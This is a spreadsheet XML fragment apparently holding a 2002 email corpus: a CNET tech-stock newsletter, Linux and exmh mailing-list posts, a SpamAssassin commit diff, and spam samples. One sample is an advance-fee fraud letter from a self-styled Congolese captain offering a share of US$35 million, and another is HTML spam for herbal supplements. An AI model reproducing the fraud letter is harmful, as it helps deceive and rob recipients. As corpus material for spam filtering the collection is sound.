 &lt;td width="25%"&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt; &lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=8b-SBGBQY0y2oGf6JSEYIEElDh4B1FR" &gt;CNET&amp;nbsp;TECH&lt;/a&gt;&lt;br&gt;990.00 &amp;nbsp;&lt;font color="#cc0000"&gt;&lt;font color=#cc0000&gt;-5.12&lt;/font&gt;&lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=4&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;!-- VISION PROMO --&gt;
 &lt;tr&gt;&lt;td colspan=4 bgcolor="#cccccc"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=4&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=4&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;CNET News.com Vision Series&lt;/b&gt;&lt;br&gt;Read News.com's exclusive interviews of 10 top CIOs.&lt;br&gt;&lt;a href="http://clickthru.online.com/Click?q=a0-11h8QQBqNNjssGPUByjw2PB1s79R" &gt;Vision Series home&lt;/a&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=4&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;!-- /VISION PROMO --&gt;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fall with consumer sentiment&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 A drop in the University of Michigan's consumer sentiment index helped put a dent in technology shares Friday.
 &lt;p&gt;
 Despite Dell Computer raising its outlook and better-than-expected earnings from Juniper Networks, CNET's Tech index slipped 5.12 points, or 0.51 percent, to 990.0. The tech-packed Nasdaq composite index edged down 0.94 points, or 0.06 percent, to 1,373.49.
 &lt;p&gt;
 Broader markets also fell, as investors shrugged off news of better-than-expected retail and food services sales in June. The Dow Jones industrials shed 117 points, or 1.33 percent, to 8,684.5--its fifth straight losing session. The S&amp;P 500 lost 5.98 points, or 0.64 percent, to 921.39.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href="http://clickthru.online.com/Click?q=b6-llkUQCKyZmZAjcoT_PUCch20LgRR" &gt;Rivals help improve Dell's outlook &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 Dell Computer on Thursday raised its revenue and earnings outlook for the second quarter, saying it continues to gain market share from computer rivals.
 The company said it now expects revenue for the quarter that ends Aug. 2 will reach $8.3 billion, up about 9 percent from last year's second quarter, with earnings of 19 cents per share. On May 16, the company predicted revenue would hit $8.2 billion and projected earnings at 18 cents per share.&lt;br&gt;&lt;B&gt;DELL COMPUTER CORP 24.98 4.39% &lt;/B&gt;
 &lt;p&gt;
 &lt;font size=3&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=cb-CjRIQJsr-vJl05NyXYHRf_uaHkFR" &gt;Lukewarm response to Juniper moves &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 Juniper Networks continues to muddle through the telecom morass.
 Juniper beat estimates by earning less than $500,000, reported a 42 percent decline in year-over-year sales and offered little hope that it could grow its business when it reported 2002 second-quarter earnings Thursday. Yet in some corners of the industry, Juniper's performance was viewed as mildly positive. &lt;br&gt;&lt;B&gt;JUNIPER NETWORKS 7.70 6.65% &lt;/B&gt;
 &lt;p&gt;
 &lt;font size=3&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=e0-cISRQfDHKLxvSMkkPhB7mxUT9A9R" &gt;Asia proves sweet spot for Yahoo&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 Web portal Yahoo, which broke a long streak of losses in the second quarter, said it hopes to ride on Asia's acceptance of online advertising and focus on wireless content to boost its regional business.
 "Asian advertisers who use traditional media like newspapers and TV are moving more into online ads as they see the value and efficiency that it delivers," Niren Hiro, Yahoo's general manager for Southeast Asia, said in an interview Thursday. "That's why we've seen in the last quarter clients who have traditionally stayed away from new media like us starting to divert their budgets in our direction."&lt;br&gt;&lt;B&gt;YAHOO INC 12.9400 0.15479876%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href="http://clickthru.online.com/Click?q=f5-lTbRQgwxlE6VmZx6DmLwgkaZmRuR"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href="http://clickthru.online.com/Click?q=0a-ZnKCIrrs-4RcArMBwhq6GOxuYzsR" &gt;J.P. Morgan downgrades Powerwave Technologies to "long-term buy" in tech notes 7/12/02 &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 Analyst Ed Snyder lowers his rating from "buy" despite a strong quarter from the wireless communications gear maker. Powerwave has a diversified customer base and fewer competitors now, Snyder suggests. But he cuts his estimates and rating based on lower guidance from the company, weak third-generation (3G) wireless network orders, and likely cuts in carrier capital expenditures. The infrastructure market remains lumpy and hard to predict, Snyder says.&lt;br&gt;&lt;B&gt;POWERWAVE TECHNOLOGIES 6.61 -13.03% &lt;/B&gt;&lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=1f-rvwqI58wtiBqvAf1xmYgHobjqmZR"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href="http://clickthru.online.com/Click?q=35-d6JTIbIziyDH27kKNXLTSyPWc3uR" &gt;AOL on the hunt for new CEO &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 AOL Time Warner has begun casting a net for a chief executive for its beleaguered America Online division.
 The move comes as no surprise. Former AOL CEO Barry Schuler stepped down from the position in April. But it raises questions about the future of Robert Pittman, AOL Time Warner's chief operating officer and the interim head of AOL. Pittman had been charged with fixing the division. As previously reported, sources in the company speculate that Pittman will not return to his duties as COO once he completes his stint at AOL.&lt;br&gt;&lt;B&gt;AOL TIME WARNER INC 13.14 -4.09% &lt;/B&gt;&lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=4a-HcgUIPpcJUoBNEFsxoLkkTKhn-yR"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href="http://clickthru.online.com/Click?q=5f-WK5BIIKX_ZAQq6l6fez6pa6cIJPR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/p/06060digidark.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
         &lt;td width="5"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
         &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=75-whwtIKUAMF7aQEG_rjups7LLZ5eR"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href="http://clickthru.online.com/Click?q=8a-3y3dQXndGBqF02jO3Nt-tKChBwsR" &gt;Panasonic's littlest Lumix&lt;/a&gt;&lt;br /&gt;
         &amp;#149; &lt;a href="http://clickthru.online.com/Click?q=9f-o7XMQ1JdPHZ5QVoYlcGhVIlcU_ZR"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href="http://clickthru.online.com/Click?q=b4-aJlbQ6Z1uG9wm-YqJzDxDXozLCdR" &gt;Canon PowerShot G2&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         2. &lt;a href="http://clickthru.online.com/Click?q=c9-3OZLQpgkBBxxGQ8jg0SxiPZvH6cR" &gt;Canon PowerShot S30&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         3. &lt;a href="http://clickthru.online.com/Click?q=de-7tpkQMWawx0cvj_tTbDS-BJjhoRR" &gt;Canon PowerShot S40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         4. &lt;a href="http://clickthru.online.com/Click?q=f3-LjwgQJOwQd5HzkgCs3CyJqsjeoFR" &gt;Canon PowerShot A40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         5. &lt;a href="http://clickthru.online.com/Click?q=08-IFoQIRjFBPyGn1Og3F-erCpGY99R" &gt;Sony Cyber Shot DSC-F707&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
         &lt;img src="http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt="" align="absmiddle" /&gt; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=1d-6KTjIGQFRz5hrbORl28NRQSnqQuR"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href="http://clickthru.online.com/Click?q=32-Gx5IIrQ6QBmttsBDFWVhZSgRXBsR"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href="http://clickthru.online.com/Click?q=48-ggFbIdBsks6CyHTXl_kj2ZBSJu4R" &gt;FREE for 30 days. Click
             here!&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;p&gt;&lt;a href="http://clickthru.online.com/Click?q=5d-JN-bIK0sQszAgt2obvZm5yGKIaeR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width="375" height="18" border="0" alt="Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;br&gt;
         &lt;!-- subscription management --&gt;
         &lt;font face="ms sans serif, geneva" size="-2"&gt; The e-mail address for your
         subscription is&amp;nbsp;qqqqqqqqqq-cnet-newsletters@example.com&lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=72-R8iHzrUKnEe7qzQRqChXcoIb0OxMcRRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@example.com&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=87-izDOQ8naL1YZNX4eplrQ8kasp4ZR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=9c-xt6pQanyyfry_j8lXdIl9Oi-UidR"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href="http://clickthru.online.com/Click?q=b1-YjxJQ-0ddp4bWkwr9i_f_B0NLncR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=c6-URF9QMLKsc9GhvJWdT_pfmeDx0RR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=db-rmY9QJEKb8juwHxvpmtTwxp6DtFR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=f1-MtTuQpsFWuKde5UH3XX8owMnercR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=06-fP6uI482xKMSFV5map_vCgSyiLRR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=1b-wAnhI3N2M0xh9PGQ1U5MauO37xFR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136487&amp;NL=e426&amp;ISSUE=2002-07-12" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 .&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=30-u8jEnsrBWMmUIzzbzlIIGDpqNsRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt;&gt;&gt;&gt;&gt; On Fri, 27 Sep 2002, "Paul" == Paul Menage wrote:
   Paul&gt; so you don't really need the unseen window unless you're
   Paul&gt; using more sequences than just "unseen".
 I use a virtual window manager and keep the main exmh window and 
 the detached folder list on one virtual desktop but the unseen 
 window is set to show on all desktops.
 Got no help for the problems, but just pointing out why some of 
 us find the unseen window invaluable.
 --Hal
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Roi wrote :
 &gt; Since I upgraded to redhat8 mplayer -vo sdl isnt working for me
 &gt; It gives me black screen and I only hear sound.
 &gt; 
 &gt; can anyone help me with this ?
 I'll test this as soon as I can.
 &gt; btw,
 &gt; also the source rpm specified that I can do --without libdv
 &gt; but it didn't work, worked for lirc and arts.
 Should be fixed : You probably had libdv-devel installed and MPlayer
 automatically detected it. The new spec file explicitely passes
 --disable-libdv when the package is rebuilt with --without libdv.
 Grab the "fr2.1" spec from here :
 http://freshrpms.net/builds/index.html?build=mplayer
 Matthias
 -- 
 Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
 Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi
 Load : 0.02 0.10 0.15
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Goats with enormous testicles, and a life-sized cow sculpted from
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85482924
 Date: Not supplied
 [IMG: http://jw.servebeer.com:8080/images/bigE/thumbnails/tn_P0002140.JPG] Jeff 
 writes: "Goats with enormous testicles, and a life-sized cow sculpted from 
 butter. Pictures from Massachusett's Eastern States Expo this weekend. Anyone 
 know the purpose of those overgrown goat gonads?" Link[1] Discuss[2] (_Thanks, 
 Jeff[3]!_) 
 [1] http://jw.servebeer.com:8080/images/bigE/index.html
 [2] http://www.quicktopic.com/boing/H/KbCG2e32dyMsB
 [3] http://jw.servebeer.com:8080
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: Re[2]: Java is for kiddies
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of Karl
 &gt; Anderson
 &gt; Sent: Thursday, September 05, 2002 3:50 AM
 &gt; To: bitbitch@magnesium.net
 &gt; Cc: 'fork@spamassassin.taint.org'
 &gt; Subject: Re: Re[2]: Java is for kiddies
 &gt;
 &gt;
 &gt; bitbitch@magnesium.net writes:
 &gt;
 &gt; &gt; SL&gt; &lt;snip&gt;
 &gt; &gt; SL&gt; Misc rants about finding jobs, java vs C, what makes a good
 &gt; programmer, etc.
 &gt; &gt; SL&gt; &lt;/snip&gt;
 &gt; &gt; &lt;snip&gt;
 &gt; &gt; SL&gt; Okay, hmm, I thought twice about this, but what the hey,
 &gt; jobs are hard to
 &gt; &gt; SL&gt; come by. There's a company hiring in Mountain View, looking
 &gt; for a few good
 &gt; &gt; &lt;/snip&gt;
 &gt; &gt;
 &gt; &gt; I give Adam an hour or so to come up with an adequate number of
 &gt; &gt; excuses as to why -this- job isn't worth it.  :)
 &gt;
 &gt; http://www.netli.com/careers/index.htm
 &gt;
 &gt; &gt;* Along with your resume, please answer this question: What does
 &gt; this _x0013_C_x0014_ statement do? #define XY(s, m) (&amp;((s *)0)-&gt;m)
 &gt;
 &gt; Besides provide job security?
 This is more useful...
 #define CONTAINING_RECORD(address, type, field) ((type *)( \
                                                   (PCHAR)(address) - \
                                                   (PCHAR)(&amp;((type
 *)0)-&gt;field)))
 Bill
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Betamax finally laid to rest
</t>
  </si>
  <si>
    <t xml:space="preserve">Not fortean, but a moment in time all the same...
 http://news.bbc.co.uk/1/hi/entertainment/film/2220972.stm
 Betamax video recorders are finally being phased out almost 20 years after
 losing the battle for dominance of the home video market to VHS. 
 Betamax's manufacturer, Sony, has announced that it will make only 2,000
 more machines for the Japanese market. 
 They have not been on sale in the rest of the world since 1998. 
 VHS became the dominant format by the mid-1980s
 Betamax was launched in 1975, and won many fans who said it was better
 quality than its VHS rival. 
 Some 2.3 million Betamax machines were sold worldwide in its peak year,
 1984, but it soon went downhill as VHS became the format of choice for the
 film rental industry and in homes. 
 Just 2,800 machines were sold in the 12 months to March 2002. 
 "With digital machines and other new recording formats taking hold in the
 market, demand has continued to decline and it has become difficult to
 secure parts," Sony said in a statement. 
 Sony said it would continue to offer repairs and manufacture tapes for the
 format. 
 The professional Betamax format, Betacam, is still widely used in the
 television and film industries and will be unaffected. 
 But the recent rise of DVDs seems to have put the final nail in the coffin
 for Betamax home players. 
 In the 1980s, many video rental chains preferred the VHS format. 
 Betamax lovers became so passionate about the format in the face of
 competition from VHS that they set up the Betaphile Club in 1988. 
 The picture and sound quality of Beta was superior to VHS, Betaphiles say,
 although VHS tapes had a longer duration. 
 A total of 18 million Betamax machines were sold around the world, but no
 new ones will be made after the end of 2002. 
 Sony is now planning to focus its efforts on new digital technologies. 
   See also:
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 Kwick Pick Portable Lock Pick - Opens Almost Any Lock!
 Locked out? Try the Kwick Pick. For $17.95, you can open car doors,
 desk drawers, padlocks, and much more! Never get locked out again!
 http://us.click.yahoo.com/O2sPyA/p6kEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] web amusements...
</t>
  </si>
  <si>
    <t xml:space="preserve">kevin lyda wrote:
 &gt; oh, and of course images/use.linux.gif is an animated gif that is
 &gt; transparent for 55 seconds and then displays "use linux!" in a large
 &gt; blue font for 5 seconds.  :)
 &gt; 
 &gt; and the way to create animated gifs is to put each frame in a layer in
 &gt; the gimp.  pick any name for each layer, but make sure each layer ends
 &gt; with (XXXms) where XXX is the number of milliseconds the frame displays.
 &gt; then use the animation tool to export the animation.
 Nice trick.
 One thing - to save an image as an animated GIF (for example),
 you just do a save as, and set the extension to .gif - you should
 get a dialog asking whether you want to merge visible layers or
 save as an animation. I believe that you can also specify the
 extension as .mpg or .mpeg if you've got the mpeg plug-in built.
 Cheers,
 Dave.
 -- 
        David Neary,
     Marseille, France
   E-Mail: bolsh@gimp.org
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SACVS] CVS: spamassassin/lib/Mail SpamAssassin.pm,1.115.2.11,1.115.2.12
</t>
  </si>
  <si>
    <t xml:space="preserve">Update of /cvsroot/spamassassin/spamassassin/lib/Mail
 In directory usw-pr-cvs1:/tmp/cvs-serv4019/lib/Mail
 Modified Files:
       Tag: b2_4_0
 	SpamAssassin.pm 
 Log Message:
 fixed bug 1033: -R and -W were not respecting auto_whitelist_path
 Index: SpamAssassin.pm
 ===================================================================
 RCS file: /cvsroot/spamassassin/spamassassin/lib/Mail/SpamAssassin.pm,v
 retrieving revision 1.115.2.11
 retrieving revision 1.115.2.12
 diff -b -w -u -d -r1.115.2.11 -r1.115.2.12
 --- SpamAssassin.pm	24 Sep 2002 18:51:37 -0000	1.115.2.11
 +++ SpamAssassin.pm	2 Oct 2002 13:19:28 -0000	1.115.2.12
 @@ -696,7 +696,13 @@
  }
  ###########################################################################
 -# non-public methods.
 +
 +=item $f-&gt;init ($use_user_prefs)
 +
 +Read and parse the current configuration. C&lt;$use_user_prefs&gt; can
 +be C&lt;0&gt; (do not read user preferences) or C&lt;1&gt; (do).
 +
 +=cut
  sub init {
    my ($self, $use_user_pref) = @_;
 @@ -767,6 +773,9 @@
    # TODO -- open DNS cache etc. if necessary
  }
 +
 +###########################################################################
 +# non-public methods.
  sub read_cf {
    my ($self, $path, $desc) = @_;
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Spamassassin-commits mailing list
 Spamassassin-commits@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-commits
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Stories for 2002-09-20
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Newsletter
 In this issue:
     * PerlQT 3 Released
 +--------------------------------------------------------------------+
 | PerlQT 3 Released                                                  |
 |   posted by ziggy on Thursday September 19, @10:41 (tools)         |
 |   http://use.perl.org/article.pl?sid=02/09/19/1443213              |
 +--------------------------------------------------------------------+
 [0]Dom2 writes "As seen on the dot, a new version of [1]PerlQT is out!
 Apparently sporting a perl version of [2]uic for developing ui's from
 XML. A [3]tutorial is available for those wanting to know more details."
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/09/19/1443213
 Links:
     0. mailto:dom@happygiraffe.net
     1. http://perlqt.infonium.com/
     2. http://doc.trolltech.com/3.0/uic.html
     3. http://perlqt.infonium.com/dist/current/doc/index.html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</si>
  <si>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The Roacheteer?  Jonny Roachpack?
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.livejournal.com/talkread.bml?journal=jwz&amp;itemid=54458
 Date: Not supplied
 http://www.livejournal.com/talkread.bml?journal=jwz&amp;itemid=54458
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 9/2/00: "In the overworked world of Web development, there's no
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/24#When:7:38:08AM
 Date: Tue, 24 Sep 2002 14:38:08 GMT
 9/2/00[1]: "In the overworked world of Web development, there's no time to 
 study, there's only time to do."
 [1] http://davenet.userland.com/2000/09/02/whatToDoAboutRss#rssIsAboutSimplicity
</t>
  </si>
  <si>
    <t xml:space="preserve">
 2) In the main window, the "+" key puts you into a "change 
    folder" mode (the first time you use it after starting exmh),
    hit a second + and you go to "set a target" mode.  Type a few
    characters of the folder name and hit space for autocomplete.
 I should have finished this off.
 3) Keep hitting space to loop thru all the folders that match 
    the characters you typed.  Hit return to actually select the
    folder shown in the message area.
 I don't use this for navigating into nested folders as the only 
 thing I have nested is my archives.  Someone else will have to 
 tell you how to do that if there are any tricks to it.
 --Hal
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Delphi Questions, a new _Joel on Software_ discussion group.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.joelonsoftware.com/news/20021007.html
 Date: Not supplied
 Delphi Questions[1], a new _Joel on Software_ discussion group.
 [1] http://discuss.fogcreek.com/delphiquestions
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAtalk] **urgent assistance**
</t>
  </si>
  <si>
    <t xml:space="preserve">5, Meridian East
 Leicester LE3 2WZ 
 Leicester City, 
 United Kingdom
 Tel/Fax: 44-870-136-7079
 Date: 09/11/2002 
 FROM: CAPT JOHN OKELE 
 DEAR SIR, 
 I got your contact through a Military friend who I did training with in your country, I am Captain JOHN OKELE the former Commander of the Security Guards of the late Laurent Kabila (former President, Democratic Republic of Congo (Africa), I am presently in self-exile with my wife and one child in remote Leicester City Britain, due to threat of the present Government headed by the son of Late Laurent Kabila after my life and my family to kill, saying that I know about the death of his father.
 I assisted Late President Laurent Kabila to keep US$35M (Thirty Five Millions) in a Security company during the War in My Country.  
 Although the security company does not know the content in the boxes deposited as we deposit it as personal effects of Mr. Laurent Kabila. It is in this respect that I seek your help to assist me in the investment of these funds before the present Government headed by the son will have knowledge of this money to avoid being taking away. 
 On conclusion of this business, I shall compensate you with 45% of the fund, while 5% is mapped out for any expense we should encounter during the cause of transaction, and the remaining amount should be used to open account for my family for investment over there with your assistance. 
 I need a profitable long-term investment plan with your company or you. Your terms, suggestions and ideas are required urgently. 
 Expecting your prompt response. Also furnish me with your current E-mail address, Tel/Fax Numbers (Private) for a personal contact with you. 
 NOTE: Please you can call or fax to the line above, it belong to my cousin, as he know the confidentiality, you can reach me direct on my mail above.  
 Yours Faithfully,
 Capt JOHN OKELE
 E-mail: johnokele2@hotmail.com
 Private E-mail: johnokele@london.com
 -------------------------------------------------------
 In remembrance
 www.osdn.com/911/
 _______________________________________________
 Spamassassin-talk mailing list
 Spamassassin-talk@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: FW:&gt;Re: Herbal Supplements only $24.99! Limited supply.                   NTZY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</si>
  <si>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&lt;title&gt;&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;table border=3D"0" width=3D"423" height=3D"166" bgcolor=3D"#800080"&gt;
   &lt;tr&gt;
     &lt;td width=3D"464" height=3D"160"&gt;
 &lt;table border=3D"0" width=3D"100%" height=3D"110" bordercolor=3D"#FFFF99" =
 bgcolor=3D"#FFFF00"&gt;
   &lt;tr&gt;
     &lt;td width=3D"514" height=3D"22" bgcolor=3D"#FFFF99" align=3D"center"&gt;
 &lt;p&gt;&lt;b&gt;&lt;font face=3D"Verdana" color=3D"#FF0000" size=3D"2"&gt;NEW! -&amp;gt;&lt;/font=
 &gt;&lt;font face=3D"Verdana" color=3D"#FF0000" size=3D"3"&gt;
 Vigoral Herbal Love Enhancers &lt;/font&gt;&lt;font face=3D"Verdana" color=3D"#FF00=
 00" size=3D"2"&gt;&amp;lt;- NEW!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td width=3D"514" height=3D"82" bgcolor=3D"#800080" align=3D"center"&gt;
 &lt;b&gt;&lt;font face=3D"Times New Roman" size=3D"3" color=3D"#FFFFCC"&gt;Straight fr=
 om our lab to you!&lt;/font&gt;&lt;/b&gt;&lt;font color=3D"#FFFFFF"&gt;&lt;br&gt;
 &lt;b&gt;&lt;font face=3D"Tahoma" size=3D"2" color=3D"#FFFFFF"&gt;We Now Offer &lt;/font&gt;=
 &lt;/b&gt;&lt;/font&gt;&lt;b&gt;&lt;font face=3D"Tahoma" size=3D"2" color=3D"#FFFFFF"&gt;3
 NEW - &lt;/font&gt;&lt;i&gt;&lt;font face=3D"Tahoma" size=3D"2" color=3D"#FFFFCC"&gt;Special=
 ly Formulated
 &amp;amp; 100% Natural&lt;/font&gt;&lt;/i&gt;&lt;font color=3D"#FFFFFF" face=3D"Tahoma" size=3D=
 "2"&gt; - products to help stimulate your moments with that special someone f=
 or&lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"2" color=3D"#FFFF99"&gt;
 &lt;/font&gt;&lt;font face=3D"Tahoma" color=3D"#FFFF99" size=3D"3"&gt;Only
 $24.99!&lt;/font&gt;&lt;/b&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table border=3D"0" width=3D"460" height=3D"78"&gt;
   &lt;tr&gt;
     &lt;td width=3D"521" height=3D"72" bgcolor=3D"#CC0066" align=3D"center" s=
 tyle=3D"border-bottom-style: solid; border-bottom-color: #FFFF99"&gt;
 &lt;p&gt;&lt;font size=3D"2"&gt;&lt;i&gt;&lt;b&gt;&lt;font face=3D"Tahoma" color=3D"#FFFFFF"&gt;&amp;quot;Th=
 e Most
 Exciting Love
 Making Experience We've Ever Had!&lt;br&gt; Vigoral is #1, Hands Down!&amp;quot;&lt;/fo=
 nt&gt;&lt;font color=3D"#FFFF99"&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;=
 nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nb=
 sp;
 &amp;nbsp;&amp;nbsp;
 &lt;font face=3D"Tahoma"&gt;- Ricardo &amp;amp; Isabelle P. of Las Vegas, NV&lt;/font&gt;&lt;=
 /font&gt;&lt;/b&gt;&lt;/i&gt;&lt;/font&gt;&lt;/p&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
       &lt;table border=3D"0" width=3D"460" height=3D"106" bgcolor=3D"#800080"=
  bordercolor=3D"#FFFF99"&gt;
         &lt;tr&gt;
           &lt;td width=3D"34%" height=3D"100" bordercolor=3D"#FFFF99"&gt;
             &lt;div align=3D"center"&gt;
               &lt;center&gt;
               &lt;table border=3D"1" width=3D"139" height=3D"84" bordercolor=3D=
 "#FFFFFF"&gt;
                 &lt;tr&gt;
                   &lt;td width=3D"131" height=3D"81" bgcolor=3D"#000080" alig=
 n=3D"center"&gt;&lt;font color=3D"#FFFFFF" size=3D"5" face=3D"Impact"&gt;&lt;i&gt;SUPER&lt;/=
 i&gt;&lt;/font&gt;&lt;b&gt;&lt;font color=3D"#FFFFFF" size=3D"5" face=3D"Tahoma"&gt;
